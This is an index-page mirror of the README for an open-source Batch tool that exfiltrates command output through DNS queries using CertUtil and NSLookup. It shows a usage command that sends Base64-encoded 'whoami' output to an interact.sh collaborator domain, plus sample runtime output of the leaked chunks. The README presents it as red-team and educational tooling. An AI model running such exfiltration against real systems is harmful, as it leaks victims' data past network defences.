Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/ivan-sincek/dns-exfiltrator
Exfiltrate data with DNS queries. Based on CertUtil and NSLookup.
https://github.com/ivan-sincek/dns-exfiltrator
batch bug-bounty burp-collaborator-server certutil dns dns-query ethical-hacking exfiltrator lolbas malware networking nslookup offensive-security penetration-testing red-team-engagement security wireshark
Last synced: about 1 month ago
JSON representation
Exfiltrate data with DNS queries. Based on CertUtil and NSLookup.
- Host: GitHub
- URL: https://github.com/ivan-sincek/dns-exfiltrator
- Owner: ivan-sincek
- License: mit
- Created: 2021-01-21T13:09:43.000Z (almost 4 years ago)
- Default Branch: main
- Last Pushed: 2023-12-30T20:23:18.000Z (11 months ago)
- Last Synced: 2024-10-05T06:44:29.642Z (about 2 months ago)
- Topics: batch, bug-bounty, burp-collaborator-server, certutil, dns, dns-query, ethical-hacking, exfiltrator, lolbas, malware, networking, nslookup, offensive-security, penetration-testing, red-team-engagement, security, wireshark
- Language: Batchfile
- Homepage:
- Size: 2.93 KB
- Stars: 21
- Watchers: 2
- Forks: 8
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# DNS Exfiltrator
Exfiltrate data with DNS queries. Based on CertUtil and NSLookup.
Base64 or Hex encode the command output using CertUtil, and then exfiltrate it in chunks up to 63 characters per query using NSLookup.
In case of Base64 encoding, some special characters will be replaced due to the domain name limitations:
| Base64 Character | Replacement |
| --- | --- |
| \+ | plus |
| \/ | slash |
| \= | eqls |Tested on Windows 10 Enterprise OS (64-bit).
Made for educational purposes. I hope it will help!
Future plans:
* create a Python script to parse `interact.sh` results,
* create a one-liner out of the whole Batch script,
* create a Burp Suite extension that will use a Burp Collaborator server.## How to Run
Download, unpack, give necessary permissions, and run the latest [interact.sh](https://github.com/projectdiscovery/interactsh/releases) client:
```fundamental
chmod +x interactsh-client./interactsh-client -dns-only -json -o interactsh.json
```After running the tool, you should be able to see the `interact.sh` (collaborator server) subdomain, e.g. `xyz.oast.fun`.
Next, make sure to specify either `base64` or `hex` as the encoding, and [Base64 encode](https://www.base64encode.org) your Batch one-liner command, e.g. `whoami` equals to `d2hvYW1p`.
Finally, open the Command Prompt from [\\src\\](https://github.com/ivan-sincek/dns-exfiltrator/tree/main/src) and run the following command:
```fundamental
dns_exfiltrator.bat xyz.oast.fun base64 d2hvYW1p
```## Runtime
```fundamental
C:\Users\W10\Desktop>dns_exfiltrator.bat xyz.oast.fun base64 d2hvYW1pIC9wcml2
################################################################
# #
# DNS Exfiltrator v1.3 #
# by Ivan Sincek #
# #
# Exfiltrate data with DNS queries. #
# GitHub repository at github.com/ivan-sincek/dns-exfiltrator. #
# #
################################################################
Server: UnKnown
Address: 172.20.10.1Non-authoritative answer:
Name: UFJJVklMRUdFUyBJTkZPUk1BVElPTiANCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0.xyz.oast.fun
Address: 206.189.156.69Server: UnKnown
Address: 172.20.10.1Non-authoritative answer:
Name: gDQpQcml2aWxlZ2UgTmFtZSAgICAgICAgICAgICAgICBEZXNjcmlwdGlvbiAgIC.xyz.oast.fun
Address: 206.189.156.69Server: UnKnown
Address: 172.20.10.1Non-authoritative answer:
Name: AgICAgICAgICAgICAgICAgICAgICAgU3RhdGUgICAgDQo9PT09PT09PT09PT09P.xyz.oast.fun
Address: 206.189.156.69...
```